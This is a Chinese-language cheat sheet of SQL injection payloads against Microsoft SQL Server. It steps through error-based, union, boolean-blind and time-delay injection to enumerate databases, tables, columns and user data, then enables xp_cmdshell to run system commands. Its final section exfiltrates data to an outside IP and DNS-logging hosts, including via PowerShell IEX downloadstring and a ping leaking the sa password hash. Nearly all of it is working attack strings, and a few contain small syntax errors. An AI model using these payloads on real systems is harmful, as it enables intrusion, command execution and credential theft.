端口:1433

Master数据库:

控制SQL Server的所有方面,这个数据库中包括所有的配置信息、用户登录信息、当前正在服务器中运行的过程的信息等

管理员账号:sa

一、基本语句

操作 语句
创建数据库 create database [dbname]
删除数据库 drop database [dbname]
创建新表 create table [tablename] (name char(10),age tinyint,sex int)
删除新表 drop table [tablename]
向表中插入内容 insert into tablename values(value1,value2)
删除内容 delete from [tablename] where 范围
查找 select * from [tablename] where field1=""

判断是否为mssql数据库 (返回正常是mssql,不正常为access)

?id=1' and  1<(select count(*) from sysobjects) --  ?id=1' and  exists (select * from sysobjects) --  

二、报错注入

操作 语句
判断注入点 1' and 1=1 返回正常
1' and 1=0 返回错误
利用数字和字符不能比较(字符发生强制类型转换错误)
注:=号可换为<、>,低版本mssql使用=可能会报错
显示数据库版本 ?id=1' and 1<(select @@version) --
显示当前数据库名字 ?id=1' and 1<(select db_name()) --
显示当前数据库连接的用户 ?id=1' and 1<(select user_name()) --
判断当前数据库连接用户的权限
页面正常为sysadmin权限
?id=1' and 1=(select is_srvrolemember('sysadmin')) --
权限有:
sysadmin、serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin
注:
and 1=(select is_member('db_owner')) --
判断是否为db_owner权限,可通过备份方式向网站写文件
获取数据库数量 当数据类型为int类型时,无法触发强制类型转换,因此需要结合convert和cast as

?id=1' and 1<char(126)%2b(select cast(count(*) as nvarchar(4000)) from master.dbo.sysdatabases)%2bchar(126) --

使用convert
?id=1' and 1<convert(int, char(126)%2b(select top 1 cast(count(*) as nvarchar(4000)) from master.dbo.sysdatabases)%2bchar(126)) --

或使用二分法
?id=1' and 1<(select count(db_name) from master.dbo.sysdatabases) --
获取数据库名称 1' and 1<(select top 1 name from master.dbo.sysdatabases where name not in (select top 0 name from master.dbo.sysdatabases)) --
内层 top 后的数字表示跳过前几个(top 0 取第一个,top 1 取第二个,以此类推),这里使用了逻辑嵌套法,下同
判断数据库的表数量 ?id=1' and 1<char(126)%2b(select top 1 cast(count(*) as nvarchar(4000)) from information_schema.tables)%2bchar(126) --

?id=1' and 1<convert(int, char(126)%2b(select top 1 cast(count(*) as nvarchar(4000)) from information_schema.tables)%2bchar(126)) --

二分法
?id=1' and 1<(select count(table_name) from information_schema.tables) --
获取表名称 ?id=1' and 1<(select top 1 table_name from information_schema.tables where table_name not in (select top 1 table_name from information_schema.tables)) --
获取列的数量 ?id=1 and 1<char(126)%2b(select top 1 cast(count(*) as nvarchar(4000)) from information_schema.columns where table_name='tbname')%2bchar(126)--

?id=1 and 1<convert(int,char(126)%2b(select top 1 cast(count(*) as nvarchar(4000)) from information_schema.columns where table_name='tbname')%2bchar(126)) --

二分法
?id=1' and 1<(select count(column_name) from information_schema.columns where table_name = 'tbname') --
获取列名 ?id=1' and 1<(select top 1 column_name from information_schema.columns where table_name = 'tbname' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'tbname')) --
获取数据数量 ?id=1 and 1<char(126)%2b(select top 1 cast(count(*) as nvarchar(4000)) from tbname..users)%2bchar(126) --

?id=1 and 1<convert(int,char(126)%2b(select top 1 cast(count(*) as nvarchar(4000)) from tbname..users)%2bchar(126)) --

二分法
?id=1' and 1<(select count(username) from tbname..users) --
获取数据值 ?id=1' and 1<(select top 1 username from tbname..users where username not in (select top 0 username from tbname..users)) --

三、union联合查询

方法 语句
判断列数 ?id=1' order by 3 --
注: mssql union select 要求前后数据类型保持一致
1、用null代替显示位
2、逐个替换null,确定各显示位的数据类型
判断显示位 ?id=-1' union select 1,2,3 --
?id=1' union select null,null,null -- (判断时不要用此句,无显示)
获取数据库版本 ?id=-1' union select 1,@@version,3 --
获取当前数据库名称 ?id=-1' union select 1,db_name(),3 --
获取数据库数量 ?id=-1' union select 1,(select count(*) from master.dbo.sysdatabases),3 --
获取数据库名称 ?id=-1' union select 1,db_name(1),3 --
db_name()表示当前数据库,db_name(1)表示第一个数据库


?id=-1' union select top 1 1,name,3 from master.dbo.sysdatabases where name not in (select top 1 name from master.dbo.sysdatabases) --
获取表数量 ?id=-1' union select top 1 1,count(table_name),3 from information_schema.tables --
获取表名称 显示当前数据库下的表名
?id=-1' union select top 1 1,table_name,3 from information_schema.tables where table_name not in (select top 1 table_name from information_schema.tables) --

显示指定数据库下的表名
?id=-1' union select top 1 1,table_name,3 from information_schema.tables where table_name not in (select top 1 table_name from dbname.information_schema.tables) --
获取列数量 ?id=-1' union select top 1 1,count(column_name),3 from information_schema.columns --

获取指定表中的字段数量
?id=-1' union select top 1 1,count(column_name),3 from information_schema.columns where table_name='users' --
获取列名 ?id=-1' union select top 1 1,table_name,3 from information_schema.columns where table_name not in (select top 0 table_name from information_schema.tables) --

指定表获取字段
?id=-1' union select top 1 column_name,2 from information_schema.columns where table_name='users' and column_name not in (select top 0 column_name FROM information_schema.columns where table_name = 'users')) --
获取数据数量 ?id=-1' union select top 1 1,count(username),3 from test..users --
获取数据值 ?id=-1' union select top 1 username from test..users where username not in (select top 0 username from test..users) --

四、Bool盲注(二分法)

方法 语句
判断 ?id=1' and 1=1 -- ?id=1' and 1=0 --
判断数据库版本长度 ?id=1' and 1<len(@@version)--
判断数据库版本名称 ?id=1' and 1<ascii(substring(@@version,1,1)) --
判断当前数据库长度 ?id=1' and 1<len(db_name()) --
判断当前数据库名称 ?id=1' and 1<ascii(substring(db_name(),1,1)) --
判断数据库数量 ?id=1' and 1<(select count(*) from master.dbo.sysdatabases) --
逐个判断数据库长度 ?id=1' and 1<len((select top 1 name from master.dbo.sysdatabases where name not in (select top 0 name from master.dbo.sysdatabases))) --
逐个判断数据库名称 ?id=1' and 1<ascii(substring((select top 1 name from master.dbo.sysdatabases where name not in (select top 0 name from master.dbo.sysdatabases)),1,1)) --
判断表数量 ?id=1' and 1<(select count(table_name) from information_schema.tables) --
逐个判断表长 ?id=1' and 1<len((select top 1 table_name from information_schema.tables where table_name not in (select top 1 table_name from information_schema.tables))) --
逐个判断表名 ?id=1' and 1<ascii(substring((select top 1 table_name from information_schema.tables where table_name not in (select top 1 table_name from information_schema.tables)),1,1)) --
判断列数 ?id=1' and 1<(select count(column_name) from information_schema.columns where table_name='tbname') --
逐个判断列的长度 ?id=1' and 1<len((select top 1 column_name from information_schema.columns where table_name = 'tbname' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'tbname'))) --
逐个判断列名 ?id=1' and 1<ascii(substring((select top 1 column_name from information_schema.columns where table_name = 'tbname' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'tbname')),1,1)) --
判断数据数量 ?id=1' and 1<(select count(username) from dbname..tbname) --
逐个判断数据长度 ?id=1' and 1<len((select top 1 username from tbname..users where username not in (select top 0 username from tbname..users))) --
逐个判断数据值 ?id=1' and 1<ascii(substring((select top 1 username from tbname..users where username not in (select top 0 username from tbname..users)),1,1)) --

五、时间延时盲注

方法 语句
判断数据库版本长度 ?id=1' if(len(@@version)>1) waitfor delay '0:0:3' --
判断数据库版本名 ?id=1' if(ascii(substring(@@version),1,1)>1) waitfor delay '0:0:3' --
判断当前数据库长度 ?id=1' if(len(db_name())>1) waitfor delay '0:0:3' --
判断当前数据库名称 ?id=1' if(ascii(db_name())>1) waitfor delay '0:0:3' --
判断数据库数量 ?id=1' if((select count(*) from master.dbo.sysdatabases)>1) waitfor delay '0:0:3'--
逐个判断数据库长度 ?id=1' if(len((select top 1 name from master.dbo.sysdatabases where name not in (select top 0 name from master.dbo.sysdatabases)))>1) waitfor delay '0:0:3' --
逐个判断数据库名 ?id=1' if(ascii(substring((select top 1 name from master.dbo.sysdatabases where name not in (select top 0 name from master.dbo.sysdatabases)),1,1))>1) waitfor delay '0:0:3' --
判断表数量 ?id=1' if((select count(table_name) from information_schema.tables)>1) waitfor delay '0:0:3'--
逐个判断表长度 ?id=1' if((select top 1 table_name from information_schema.tables where table_name not in (select top 1 table_name from information_schema.tables))>1) waitfor delay '0:0:3'--
逐个判断表名 ?id=1' if(ascii(substring((select top 1 table_name from information_schema.tables where table_name not in (select top 1 table_name from information_schema.tables)),1,1))>1) waitfor delay '0:0:3'--
判断列数 ?id=1' if((select count(column_name) from information_schema.columns where table_name='tbname')>1) waitfor delay '0:0:3'--
逐个判断列长 ?id=1' if((select top 1 column_name from information_schema.columns where table_name = 'tbname' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'tbname'))>1) waitfor delay '0:0:3'--
逐个判断列名 ?id=1' if(ascii(substring((select top 1 table_name from information_schema.columns where column_name not in (select top 1 column_name from information_schema.columns)),1,1))>1) waitfor delay '0:0:3'--
判断数据数量 ?id=1' if((select count(username) from tbname..users)>1) waitfor delay '0:0:3' --
逐个判断数据长度 ?id=1' if(len((select top 1 username from tbname..users where username not in (select top 0 username from tbname..users)))>1) waitfor delay '0:0:3' --
逐个判断数据值 ?id=1' if(ascii(substring((select top 1 username from tbname..users where username not in (select top 0 username from tbname..users)),1,1))>1) waitfor delay '0:0:3'--

六、命令执行

xp_cmdshell 默认处于关闭状态,只有 sysadmin 等具备 ALTER SETTINGS 服务器权限的账号才能通过 sp_configure 开启

EXEC sp_configure 'show advanced options', 1;

RECONFIGURE;

EXEC sp_configure 'xp_cmdshell', 1;

RECONFIGURE;

开启xp_cmdshell功能

?id=1'; EXEC sp_configure 'show advanced options', 1;--

?id=1'; RECONFIGURE;--

?id=1'; EXEC sp_configure 'xp_cmdshell',1--

?id=1'; RECONFIGURE--

验证xp_cmdshell功能

?id=1'; exec master..xp_cmdshell 'ping -n 10 127.0.0.1' --

用sql注入,来获取命令执行结果

1、创建一个表,再把命令执行的结果,写入到表中。

`?id=1'; create table sqldata(result VARCHAR(8000)); --`

2、执行命令,并且把结果写入表中

方法 语句
直接写入 ?id=1';INSERT INTO sqldata (result) EXEC master..xp_cmdshell 'net user'--
转换一下 ?id=1';DECLARE @adqa VARCHAR(8000);SET @adqa=0x6970636F6E666967202F616C6C;INSERT INTO sqldata(result) EXEC master..xp_cmdshell @adqa--

七、DNS外带

方法 语句
字符型外带–指定ip端口 ?id=1;DECLARE @a varchar(8000);SET @a=(SELECT TOP 1 master.dbo.fn_varbintohexstr(CONVERT(varbinary,name)) from Master.dbo.SysDatabases);exec('master..xp_cmdshell "powershell IEX (new-object net.webclient).downloadstring("http://172.16.12.187:9008/?data='%2b @a %2b' ")"' ) --
数字型外带–指定ip端口 ?id=1;DECLARE @a VARCHAR(8000);SET @a=(SELECT TOP 1 substring(@@version,1,35));exec('master..xp_cmdshell "powershell IEX (new-object net.webclient).downloadstring("http://172.16.12.187:9008/?data='%2b @a %2b' ")"' ) --
字符型外带–dnslog平台*** ?id=1';declare @a varchar(1024);set @a=db_name();exec('master..xp_dirtree "//'%2B @a %2B'.dnslog.io"')--
数字型外带–dnslog平台 ?id=1; declare @a varchar(1024);set @a=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa'); exec('master..xp_cmdshell "ping -n 2' %2b @a %2b '.dnslog.com' ")--

http外带需要监听http端口(python -m http.server 9008)